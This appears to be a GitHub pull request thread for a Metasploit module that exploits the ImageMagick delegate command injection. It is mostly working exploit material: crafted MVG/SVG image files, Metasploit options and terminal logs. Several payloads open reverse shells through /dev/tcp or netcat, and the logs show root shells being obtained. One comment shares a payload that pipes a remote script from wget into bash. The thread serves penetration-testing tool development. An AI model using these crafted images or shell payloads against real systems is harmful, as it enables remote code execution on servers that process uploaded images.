What is it?

ImageMagick® is a software suite to create, edit, compose, or convert bitmap images. It can read and write images in a variety of formats (over 200) including PNG, JPEG, JPEG-2000, GIF, TIFF, DPX, EXR, WebP, Postscript, PDF, and SVG.

Basically, it's magic. With images.

How does it work?

ImageMagick/ImageMagick@06c41ab
ImageMagick/ImageMagick@a347456

If you read the first commit, you can see an XML file with a list of file formats associated to shell commands...

Since ImageMagick uses file magic to detect file format, you can create a .png (for example) which is actually a crafted SVG (for example) that triggers the command injection.

PoC (à la Shellshock): convert 'https:";echo vulnerable"' - 2>&-.

Verification steps:

• convert msf.png msf.jpg to trigger the bug
• Test all payloads against all targets against all supported platforms
• Get a shell in every case that would logically work

Shoutout to @hdm, @OJ, and @Viss for the great conversation on this bug!

Please see #6849 for a bug that reared its head in this PR.

@wvu-r7 Could you share how to reverse shell. I can execute commands as follow, but fail to use MVG created by metasploit

Lab Information:

root@lab:/tmp/imagemagick_delegate# uname -a
Linux lab 4.3.0-kali1-686-pae #1 SMP Debian 4.3.5-1kali1 (2016-02-11) i686 GNU/Linux

Testing

msf exploit(imagemagick_delegate) > show options

Module options (exploit/unix/fileformat/imagemagick_delegate):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.svg          yes       Output file


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.0.105    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   MVG file

root@lab:/tmp/imagemagick_delegate# cat exp.jpg
push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 'url(https://example.com/image.jpg";0<&90-;exec 90<>/dev/tcp/190.168.0.105/4444;sh <&90 >&90 2>&90")'
pop graphic-context
pop graphic-context

root@lab:/tmp/imagemagick_delegate# convert -verbose exp.jpg abc.png
sh: 1: Syntax error: Bad fd number
exp.jpg MVG 1x1 1x1+0+0 16-bit sRGB 255B 0.000u 0:02.269
exp.jpg=>abc.png MVG 1x1 1x1+0+0 8-bit sRGB 2c 258B 0.000u 0:00.010
convert: delegate failed `"curl" -s -k -L -o "%o" "https:%M"' @ error/delegate.c/InvokeDelegate/1310.
convert: no decode delegate for this image format `HTTPS' @ error/constitute.c/ReadImage/535.

root@lab:/tmp/imagemagick_delegate# cat exploit.jpg
push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 'url(https://example.com/image.jpg"|ls "-la)'
pop graphic-context
pop graphic-context


root@lab:/tmp/imagemagick_delegate# convert -verbose exploit.jpg abc.png
total 16
drwxr-xr-x  2 root root 4096 May  4 11:56 .
drwxrwxrwt 17 root root 4096 May  4 11:57 ..
-rw-r--r--  1 root root  255 May  4 11:56 exp.jpg
-rw-r--r--  1 root root  199 May  4 11:56 exploit.jpg
exploit.jpg MVG 1x1 1x1+0+0 16-bit sRGB 199B 0.000u 0:02.210
exploit.jpg=>abc.png MVG 1x1 1x1+0+0 8-bit sRGB 2c 258B 0.000u 0:00.000
convert: no decode delegate for this image format `HTTPS' @ error/constitute.c/ReadImage/535.

@wvu-r7 If I run the following command in terminal, a shell will be given.

root@lab:/tmp/imagemagick_delegate# 0<&92-;exec 92<>/dev/tcp/192.168.0.105/4444;sh <&92 >&92 2>&92

msf exploit(imagemagick_delegate) > show options

Module options (exploit/unix/fileformat/imagemagick_delegate):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.svg          yes       Output file


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.0.105    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   MVG file


msf exploit(imagemagick_delegate) > run

[*] Started reverse TCP handler on 192.168.0.105:4444
[+] msf.svg stored at /Users/Open-Security/.msf4/local/msf.svg
[*] Command shell session 3 opened (192.168.0.105:4444 -> 192.168.0.105:54343) at 2016-05-04 11:08:12 -0500

id
uid=0(root) gid=0(root) groups=0(root)

@wvu-r7 cmd/unix/reverse_netcat works well.

msf exploit(imagemagick_delegate) > show options

Module options (exploit/unix/fileformat/imagemagick_delegate):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.svg          yes       Output file


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.0.105    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   MVG file


msf exploit(imagemagick_delegate) > run

[*] Started reverse TCP handler on 192.168.0.105:4444
[+] msf.svg stored at /Users/Open-Security/.msf4/local/msf.svg
[*] Command shell session 4 opened (192.168.0.105:4444 -> 192.168.0.105:55222) at 2016-05-04 11:52:59 -0500

id
uid=0(root) gid=0(root) groups=0(root)
pwd
/tmp/imagemagick_delegate
cat 2.jpg
push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 'url(https:";mknod /tmp/vtxwuue p; nc 192.168.0.105 4444 0</tmp/vtxwuue | /bin/sh >/tmp/vtxwuue 2>&1; rm /tmp/vtxwuue ")'
pop graphic-context
pop graphic-context

@join-us: Okay, so you're running on Kali, which does have net redirections enabled in bash. However, the actual problem is that /bin/sh is dash. :)

@join-us: After #6849 lands, reverse_netcat should be even more reliable.

Actually, Thanks @wvu-r7

root@lab:/tmp/imagemagick_delegate# ls -al /bin/sh
lrwxrwxrwx 1 root root 4 Mar 12 04:05 /bin/sh -> dash

If I link sh to /bin/bash, a meterpreter shell appears.

@join-us: I recommend using cmd/unix/generic for exceptional cases. Sometimes, a custom payload is just better. ;)

So we can do .png files as well, which are suuuuper portable. Here's the syntax:

push graphic-context
viewbox 0 0 1 1
image over 0,0 0,0 'https://asdf/"; "'

I didn't have any luck with the direct tcp redirection bash stuff, but it looks you got that sorted out first thing. My current payload is literally literally:

wget -q -O - http://some.payload/online/somewhere | /bin/bash

which allows me to basically have one static "image", and have the payload be whatever I want on a site somewhere, so I wasn't screwing around trying to double-escape stuff and shove all sorts of random crap into the payload string.

if only there was solid linux meterpreter - we could actually put that in the payload itself and have a .png or .svg that pops meterp :D

@Viss: That's still MVG. See https://github.com/rapid7/metasploit-framework/pull/6848/files#diff-6d1c1509ad0545cb67da18afc1dc7e08R56.

IMHO, the type confusion is purely incidental. The real bug is in unsanitized input. (Isn't it always? :)

wvu@kharak:~$ cat > viss.png
push graphic-context
viewbox 0 0 1 1
image over 0,0 0,0 'https://asdf/"; "'
wvu@kharak:~$ file viss.png 
viss.png: ASCII text
wvu@kharak:~$ convert -verbose viss.png viss.jpg
sh: : command not found
viss.png MVG 1x1 1x1+0+0 16-bit sRGB 76B 0.000u 0:00.210
viss.png=>viss.jpg MVG 1x1 1x1+0+0 16-bit Bilevel Gray 160B 0.000u 0:00.000
convert: delegate failed `"curl" -s -k -L -o "%o" "https:%M"' @ error/delegate.c/InvokeDelegate/1333.
convert: unable to open image `/var/tmp/magick-56312z2E3ct3IWpdM': No such file or directory @ error/blob.c/OpenBlob/2702.
convert: unable to open file `/var/tmp/magick-56312z2E3ct3IWpdM': No such file or directory @ error/constitute.c/ReadImage/540.
wvu@kharak:~$ 

This is great work @wvu-r7. Making stuff like this portable across OSes is a right royal PITA.

If you want to test on Windows you can use Chocolatey - https://chocolatey.org/packages/imagemagick/6.9.3.8
Looks like they have the patched version up, but doesn't mean everyone is using it yet:

Also, if you are a version hoarder: ftp://ftp.icm.edu.pl/pub/graphics/ImageMagick/binaries/

@mubix: Those should still be vulnerable. I've updated the module description to include the legacy release.

MIFF vector fixed: ImageMagick/ImageMagick@f7f737e.

Rebased because I needed #6849 (landed).

HTTPS delegate removed and readded but commented out: ImageMagick/ImageMagick@e5ae849, ImageMagick/ImageMagick@dc553c1.